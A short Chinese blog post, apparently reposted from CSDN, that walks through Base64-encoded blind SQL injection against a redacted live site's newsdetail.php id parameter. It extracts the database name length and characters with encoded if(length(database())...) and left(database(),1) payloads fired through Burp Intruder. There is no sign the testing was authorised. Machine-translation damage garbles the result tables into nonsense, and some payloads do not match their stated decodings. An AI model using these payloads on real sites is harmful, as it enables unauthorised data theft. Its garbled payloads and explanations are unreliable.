编码注入,sql注入编码

编码注入Url:http://www.xxxxxxxx/newsdetail.php?idMjgxOA
判断参数Id存在数字型注入,试了报错注入不行,只能去盲注了
验证Poc1:idMTg4OS

网址:http://www.xxxxx

xxx/newsdetail.php?id=MjgxOA==

确定参数Id有数字注入,我尝试了错误注入,但只能使用盲注。

Poc1:验证id=MTg4OS8x 等于id=1889/1。 poc2: id=MTg4OS8w 相当于id=1889/0。

/1

/0

使用ASCII码确定数据库名称长度(忘记截图了),确定数据库名称长度是5或者6,构建POC进一步确定数据库名称长度为6。

检查数据库名称长度:

Poc: id=MTg4OS9pZihsZW5ndGgoZGF0YWJhc2UoKSk9NiwxLDAp

等价: 1889/if(length(database())=6,1,0)

Poc: MS9pZihsZWZ0KGRhdGFiYXNlKCksMSk9J2EnLDEsMCk=

: 相当于1889/if(length(database())!=6,1,0)

接下来,可以直接构建POC并将其送入BPblast,但在blast之前,必须先进行Base64编码。

首先对除1和a之外的payload(需要扩展的参数)进行Base64编码。

有效负载:id=MTg4OS9pZihsZWZ0KGRhdGFiYXNlKCks1KT0naJywxLDAp

相当于1889/if(left(database(),1)=\’a\’,1,0)

选择Cluster Bomb 作为攻击类型,选择Base64 作为有效负载处理。

展开结果

有效负载1 有效负载2

分子量==aQ==

NQ==aQ==

NA==aQ==

MQ==AG==

NG==aQ==

镁==银==

然后进行编码转换,结果为:

支付1 支付2

3i

5i

4 我

1j

6 我

2j

#以上有关编码注入的相关内容来自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92533.html

Like (0)
CSDN的头像CSDN
Previous 2024年6月27日
Next 2024年6月27日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注